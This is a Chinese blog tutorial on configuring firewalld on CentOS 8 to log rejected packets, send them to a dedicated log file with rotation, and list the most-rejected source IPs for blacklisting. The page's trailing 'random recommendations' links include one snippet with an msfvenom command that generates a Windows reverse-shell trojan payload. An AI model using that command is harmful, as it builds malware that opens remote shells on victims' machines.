一,firewalld配置日志的用途:

在生产环境中,firewalld的默认配置是不记录日志

我们通过日志记录下防火墙过滤时拒绝的非法ip,

可以主动把这些有攻击性的ip加入到黑名单,

防患于未然

说明:刘宏缔的架构森林是一个专注架构的博客,地址:https://www.cnblogs.com/architectforest

对应的源码可以访问这里获取: https://github.com/liuhongdi/

说明:作者:刘宏缔 邮箱: 371125307@qq.com

二,配置firewalld记录被reject包的日志

修改firewalld的配置文件

[root@blog log]# vi /etc/firewalld/firewalld.conf

设置下面一项的值:

LogDenied=all

说明:

默认值是off,即不记录被拒的包

设置为all,表示记录所有被拒的包

重启firewalld服务,使日志配置生效

[root@blog log]# systemctl restart firewalld.service

验证配置是否生效:

#--get-log-denied: 得到记录被拒日志的配置项的值

[root@blog ~]# firewall-cmd --get-log-denied

all

说明配置已生效

三,测试firewalld被拒数据包后是否记录日志

另外找一台机器,telnet到firewalld所在服务器上一个不开放的端口

[lhd@web2 ~]$ telnet 121.122.123.47 22

Trying 121.122.123.47...

telnet: connect to address 121.122.123.47: No route to host

回到原服务器查看denied日志:

[root@blog ~]# dmesg | grep -i reject

[11761159.473094] FINAL_REJECT: IN=eth0 OUT= MAC=00:16:3e:16:7c:a5:ee:ff:ff:ff:ff:ff:08:00 
SRC=121.122.123.87 DST=172.17.11.21 LEN=52 TOS=0x10 PREC=0x00 TTL=56 ID=45900 DF PROTO=TCP SPT=28477 DPT=22 
WINDOW=14600 RES=0x00 SYN URGP=0

...

可以看到未连接成功的请求也被记录下来了

说明:如果是ecs外部有云服务的防火墙,请求到不了主机则不会记录失败的请求

四,配置firewalld的运行时日志到指定的文件:

1,创建firewalld的运行时日志文件

[root@blog log]# vi /etc/rsyslog.d/firewalld.conf

内容:指定日志的路径

kern.* /var/log/firewalld.log

2,配置日志的滚动

[root@blog log]# vi /etc/logrotate.d/syslog

内容:把上面指定的firewalld.log加入进去即可

/var/log/cron

/var/log/maillog

/var/log/messages

/var/log/secure

/var/log/firewalld.log

/var/log/spooler

{

    missingok

    sharedscripts

    postrotate

        /usr/bin/systemctl kill -s HUP rsyslog.service >/dev/null 2>&1 || true

    endscript

}

3,修改完成后重启rsyslog服务

[root@blog rsyslog.d]# systemctl restart rsyslog.service

4,查看日志:

[root@blog log]# more /var/log/firewalld.log

May 25 17:01:15 blog kernel: FINAL_REJECT: IN=eth0 OUT= MAC=00:16:3e:16:7c:a5:ee:ff:ff:ff:ff:ff:08:00 
SRC=93.235.100.170 DST=172.17.11.21 LEN=44 TOS=0x14 PREC=0x00 TTL=241 ID=54321 PROTO=TCP SPT=58690 DPT=22 
WINDOW=65535 RES=0x00 SYN URGP=0

...

可以发现有对22端口的试探

因为firewalld未开放22端口,所以被拒绝的同时记录到了日志

五,找出被防火墙拒绝的最多的20个IP

#FINAL_REJECT:是被拒绝请求的日志中的标志字串

[root@blog log]# grep 'FINAL_REJECT:' /var/log/firewalld.log | awk '{print $10}' | sort -n | uniq -c | sort -k1nr | head -10

     10 SRC=43.243.12.116

      1 SRC=189.203.131.96

      1 SRC=85.209.0.101

      1 SRC=87.251.74.50
      ...

六,查看firewalld的版本

[root@blog log]# firewall-cmd --version

0.6.3

说明;服务端程序firewalld没有打印版本的选项,使用客户端程序firewall-cmd即可

七,查看centos的版本

[root@blog log]# cat /etc/redhat-release

CentOS Linux release 8.0.1905 (Core)

linux(centos8):firewalld的运行时日志配置的更多相关文章

  1. ETCD:运行时重新配置

    原文地址:runtime reconfiguration etcd带有增量运行时重新配置的支持.允许我们在集群运行的时候更新集群成员关系. 仅当大多数集群成员都在运行时,才能处理重新配置请求,强烈建议 ...

  2. set_include_path — 设置 include_path 配置选项为当前脚本设置 include_path 运行时的配置选项。

    说明 string set_include_path ( string $new_include_path ) 为当前脚本设置 include_path 运行时的配置选项. 参数 new_includ ...

  3. ETCD:运行时重新配置设计

    原文地址:the runtime configuration design 运行时重新配置是分布式系统中最难,最容易出错的部分,尤其是在基于共识(像etcd)的系统中. 阅读并学习关于etcd的运行时 ...

  4. 如何查看Linux系统下程序运行时使用的库?

    Linux系统下程序运行会实时的用到相关动态库,某些场景下,比如需要裁剪不必要的动态库时,就需要查看哪些动态库被用到了. 以运行VLC为例. VLC开始运行后,首先查看vlc的PID,比如这次查到的V ...

  5. linux(centos8):firewalld对于请求会选择哪个zone处理?

    一,firewalld对一个请求会适用哪个zone? 当接收到一个请求时,firewalld具体使用哪个zone? firewalld是通过三个步骤来判断的: source,即:源地址 interfa ...

  6. linux(centos8):firewalld使用ipset管理ip地址的集合

    一,firewalld中ipset的用途: 1,用途 ipset是ip地址的集合, firewalld使用ipset可以在一条规则中处理多个ip地址, 执行效果更高 ​对ip地址集合的管理也更方便 2 ...

  7. linux 自编软件运行时权限不足问题

    在非根目录下" ./*.out " 文件时出现显示运行的权限不足的问题,经过调查,有人给出方案: 方案1: 在Linux下执行一个文件时候提示“权限不够”的解决办法如下 转到那个文 ...

  8. maven运行时的配置及命令详解

      上面是指定端口运行程序的,也可以先指定好,直接在上面的地方写jettty:run           当然,如果你是在控制台运行且安装了maven,直接可以进入项目的文件中:mvn jetty:r ...

  9. Tomcat打印运行时日志(控制台),访问日志,启动日志

    1.sh catlina.sh run以控制台形式输出 2.sever.xml.配置acesslog,设置访问日志输出 Tomcat的访问日志是靠org.apache.catalina.valves. ...

随机推荐

  1. msf生成木马

    Msf生成木马:(多层加密都不能免杀) msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.143 lport=7001 -f raw -e ...

  2. 微信小程序 | 模仿百思不得其姐

    微信小程序 仿百思不得姐 设备 微信开发者工具 v1.02.1901230 扩展 修复了视频点击播放不流畅的问题 修复了视频的暂停够无法播放问题 优化了部分页面 接口 首页 http://api.bu ...

  3. Mysql数据分片技术(一)——初识表分区

    1. 为什么需要数据分片技术 2. 3种数据分片方式简述 3. 分片技术原理概述 4. 对单表分区的时机 1为什么需要数据分片技术 数据库产品的市场 在互联网行业内,绝大部分开发人员都会遇到数据表的性 ...

  4. SSM框架整合核心内容

    所需要的jar包及其版本 Spring 版本:4.3.18   tx.aop.beans.core.web.web-mvc.context.expression.jdbc MyBatis:3.4.6 ...

  5. LR Robust Stereo VIO for Fast Autonomous Flight

    Abstract 我们展示说我们的Stereo MSCKF在算力上跟state-of-the-art的单目方案是可比的, 而且提供了很大的鲁棒性. 1. Introduction 贡献 第一个开源的f ...

  6. SpringBoot框架:配置文件application.properties和application.yml的区别

    一.格式 1.application.properties格式: server.port=8080 server.servlet.context-path=/cn spring.datasource. ...

  7. Windows批处理(cmd/bat)常用命令学习

    前言 批处理文件(batch file)包含一系列 DOS命令,通常用于自动执行重复性任务.用户只需双击批处理文件便可执行任务,而无需重复输入相同指令.编写批处理文件非常简单,但难点在于确保一切按顺序 ...

  8. 从零搭建Spring Boot脚手架(7):Elasticsearch应该独立服务

    1. Spring Data Elasticsearch Spring Data Elasticsearch是Spring Data项目的子项目,提供了Elasticsearch与Spring的集成. ...

  9. python语言开发环境配置

    原作者:龙行天下-super 地址:https://www.cnblogs.com/longxingtianxia/p/10181901.html 要点:IDLE是一个轻量级python语言开发环境, ...

  10. 读完这篇,让你真正理解Redis持久化

    什么叫持久化? 用一句话可以将持久化概括为:将数据(如内存中的对象)保存到可永久保存的存储设备中. 持久化的主要应用是将内存中的对象存储在数据库中,或者存储在磁盘文件中. XML 数据文件中等等. 也 ...